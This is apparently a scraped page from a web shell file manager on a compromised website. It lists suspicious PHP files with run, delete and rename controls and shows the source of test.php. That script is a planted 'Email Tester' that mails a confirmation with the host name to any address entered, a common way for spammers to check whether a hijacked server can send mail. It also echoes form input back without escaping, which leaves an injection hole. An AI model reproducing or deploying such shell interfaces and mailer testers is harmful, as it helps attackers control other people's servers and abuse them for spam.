at path:
ROOT
/
test.php
run:
R
W
Run
.well-known
DIR
2026-08-07 14:07:21
R
W
Run
images
DIR
2026-08-07 11:30:46
R
W
Run
medalgame
DIR
2026-08-07 23:28:49
R
W
Run
chosen.php
122.65 KB
2026-08-05 01:25:37
R
W
Run
Delete
Rename
customize.php
604 By
2025-07-03 07:55:54
R
W
Run
error_log
215.76 KB
2026-08-07 07:38:38
R
W
Run
Delete
Rename
google499cc5ebb3a3aa35.html
53 By
2025-07-03 07:44:35
R
W
Run
hiroshi.php
118.18 KB
2025-07-03 07:44:07
R
W
Run
item.php
118.14 KB
2025-07-03 07:43:39
R
W
Run
robots.txt
282 By
2026-08-07 07:52:06
R
W
Run
Delete
Rename
simple.php
15.05 KB
2026-08-05 01:25:36
R
W
Run
Delete
Rename
test.php
737 By
2026-08-05 22:44:19
R
W
Run
Delete
Rename
unzip.php
12.4 KB
2026-08-05 22:44:25
R
W
Run
Delete
Rename
error_log
up
📄
test.php
Save
<?php error_reporting(0); echo '<b>Email Tester [Sending test].<b><br><br><form method="post"> <input type="text" placeholder="email" name="email" value="'.$_POST['email'].'"> <input type="text" placeholder="ID" name="orderid" value="'.$_POST['orderid'].'"> <input type="submit" value="Send"> </form> <br>'; if (!empty($_POST['email'])) { if (!empty($_POST['email']) && trim($_POST['orderid']) != '') { $rand = trim($_POST['orderid']); } else { $rand = rand(); } mail(trim($_POST['email']),$_SERVER['HTTP_HOST']." - Sending is Working Fine. [Result] ID: (".$rand.")"," [Sending test]."); echo '<b>Send an report to ['.$_POST['email'].'] - ID: '.$rand.'</b>'; echo '<!-- <id>'.$rand.'</id> -->'; } ?>